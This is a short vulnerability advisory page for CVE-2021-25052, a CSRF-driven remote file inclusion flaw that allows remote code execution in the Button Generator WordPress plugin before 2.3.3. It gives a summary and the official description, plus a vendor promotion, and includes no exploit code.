CVE-2021-25052
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
In short
The Button Generator WordPress plugin before version 2.3.3 has a security flaw that allows attackers to trick administrators into loading and executing malicious PHP files from the internet, potentially taking over the website.
Technical detail
CWE-352 (CSRF) combined with remote file inclusion vulnerability in the admin menu page. An attacker can craft a malicious request that, when visited by an authenticated administrator, causes the plugin to include and execute arbitrary PHP files via data://, http://, or direct file paths. Requires admin interaction but results in remote code execution with WordPress privileges.
Summary generated and translated by AI from the official description.
The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
Affected products
Unknown · Button Generator – easily Button BuilderWant to know if your infrastructure is exposed to this?
Talk to TrueHacking →